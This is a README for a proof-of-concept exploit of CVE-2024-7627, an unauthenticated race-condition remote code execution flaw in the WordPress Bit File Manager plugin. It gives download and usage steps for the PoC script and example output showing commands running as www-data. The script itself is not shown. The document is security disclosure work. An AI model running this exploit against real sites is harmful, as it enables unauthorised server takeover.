# CVE-2024-7627-PoC

## Background

This Proof-of-Concept (PoC) script is for WordPress plugin Bit File Manager version 6.0 - 6.5.5 Unauthenticated Remote Code Execution via Race Condition (CVE-2024-7627) vulnerability.

## Information

Description:

The Bit File Manager plugin for WordPress is vulnerable to Remote Code Execution in versions 6.0 to 6.5.5 via the 'checkSyntax' function. This is due to writing a temporary file to a publicly accessible directory before performing file validation. This makes it possible for unauthenticated attackers to execute code on the server if an administrator has allowed Guest User read permissions. (From [https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition))

## Technical Details

Writeup: [https://siunam321.github.io/ctf/Bug-Bounty/Wordfence/how-i-found-my-first-vulnerabilities-in-6-different-wordpress-plugins-part-2/#flawedmissing-permission-check---bit-file-manager-rce-via-race-condition](https://siunam321.github.io/ctf/Bug-Bounty/Wordfence/how-i-found-my-first-vulnerabilities-in-6-different-wordpress-plugins-part-2/#flawedmissing-permission-check---bit-file-manager-rce-via-race-condition)

## Installation

```bash
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py
```

## Usage/Exploitation

- Prerequisite: Guess user access and shortcode `file-manager` must already been setup by the adminsitrator

Update the Python script `poc.py`'s `targetBaseUrl`, `fileManagerPostPath`, and/or `commandToExecute` to your desired value. Then, run `python3 poc.py` to run the PoC script.

Example output:

```shell
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6
```
